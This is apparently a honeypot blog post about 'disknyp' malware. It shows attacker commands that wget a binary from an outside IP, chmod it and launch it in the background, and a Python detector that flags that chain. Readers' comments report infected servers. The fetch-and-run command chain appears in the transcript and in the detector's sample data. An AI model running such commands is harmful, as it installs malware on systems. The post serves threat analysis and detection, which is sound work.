disknyp

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
--2013-12-01 03:58:03--  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22... connected.
HTTP request sent, awaiting response... 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>

The file is a 1491887-byte ELF 32-bit LSB executable. I don’t know yet what it is doing.
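The session above follows a fixed shape: delete any earlier copy, fetch the binary over HTTP (here from port 22 rather than 80), make it executable, and launch it detached with nohup. As an added example that is not part of the original post, the following Python script extracts that chain from honeypot transcript lines and flags it; the transcript and the benign session embedded in it are constructed from the session shown above, and the prompt pattern `**:~#` is assumed to be the honeypot's own.

```python
"""Flag the fetch / chmod / background-launch chain seen in the disknyp session."""
import re
from dataclasses import dataclass, field
from posixpath import basename
from urllib.parse import urlparse

# Constructed sample transcript, reproducing the commands captured above
# (the hypothetical prompt "**:~#" marks attacker-typed lines; other lines are output).
RAW_TRANSCRIPT = """\
**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
--2013-12-01 03:58:03--  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22... connected.
HTTP request sent, awaiting response... 503
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
"""

# Constructed benign session for contrast: a chmod without the execute bit, no download.
BENIGN_COMMANDS = ["ls -la", "cat /etc/hostname", "chmod 644 notes.txt"]

PROMPT_RE = re.compile(r"^\S*:~[#$]\s*")           # "**:~# " style prompt
DOWNLOAD_RE = re.compile(r"^(?:wget|curl)\b.*?(https?://\S+)")
CHMOD_RE = re.compile(r"^chmod\s+(?:-\S+\s+)*(\S+)\s+(\S+)")
NOHUP_RE = re.compile(r"^nohup\s+(\S+)")
BACKGROUND_RE = re.compile(r"^(\S+).*&\s*$")      # any command ending in '&'


def commands_from_transcript(text):
    """Keep only the lines the attacker typed (those carrying the prompt)."""
    cmds = []
    for line in text.splitlines():
        m = PROMPT_RE.match(line)
        if m:
            cmd = line[m.end():].strip()
            if cmd:
                cmds.append(cmd)
    return cmds


def mode_adds_exec(mode):
    """True if an octal mode (e.g. 0777) or symbolic mode (e.g. u+x) grants execute."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return bool(re.search(r"[+=]\S*x", mode))


@dataclass
class Verdict:
    downloads: list = field(default_factory=list)    # (url, dropped file name)
    exec_chmods: list = field(default_factory=list)  # file names granted execute
    launched: list = field(default_factory=list)     # paths run via nohup or trailing '&'
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self):
        return bool(self.reasons)


def analyse(commands):
    """Correlate download, chmod and launch steps that all name the same file."""
    v = Verdict()
    for cmd in commands:
        m = DOWNLOAD_RE.match(cmd)
        if m:
            url = m.group(1)
            parsed = urlparse(url)
            v.downloads.append((url, basename(parsed.path)))
            # A plain-HTTP fetch from a port other than 80/443 is worth a note on its own.
            if parsed.port not in (None, 80, 443):
                v.reasons.append(
                    f"HTTP fetch from non-standard port {parsed.port} ({parsed.hostname})")
            continue
        m = CHMOD_RE.match(cmd)
        if m and mode_adds_exec(m.group(1)):
            v.exec_chmods.append(basename(m.group(2)))
            continue
        m = NOHUP_RE.match(cmd) or BACKGROUND_RE.match(cmd)
        if m:
            v.launched.append(m.group(1))
    dropped = {name for _, name in v.downloads}
    for path in v.launched:
        name = basename(path)
        if name in dropped and name in v.exec_chmods:
            v.reasons.append(
                f"download -> chmod +x -> background launch chain for '{name}'")
    return v


if __name__ == "__main__":
    verdict = analyse(commands_from_transcript(RAW_TRANSCRIPT))
    for reason in verdict.reasons:
        print("ALERT:", reason)
    print("benign session suspicious:", analyse(BENIGN_COMMANDS).suspicious)
```

The matching is deliberately keyed on the file name shared across the three steps rather than on the string "disknyp", so the same rule flags the chain whatever the dropped binary is called; the non-standard port check is a separate reason so it still fires when the launch step fails, as it did here with the missing nohup.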


2 Responses to “disknyp”

  1. Kent says:

    I got this on my Debian box sometime in the past couple weeks but I don’t know where it came from. Started noticing lots of CPU and network activity and saw “disknyp” in the process list. I even got email from my ISP about unusually high traffic.

    The disknyp binary was in the /root directory along with a directory named .o

    I deleted both and things seem to be ok.

  2. gabi says:

    Interesting, I’ve recently seen the same lines on a friend’s web server on AWS. Any updates on what the binary does? Also, I was brought here by Google with exactly the same lines, so the server with this file has been up for a while now. Let me know if you’re interested in joining me for reverse engineering it.
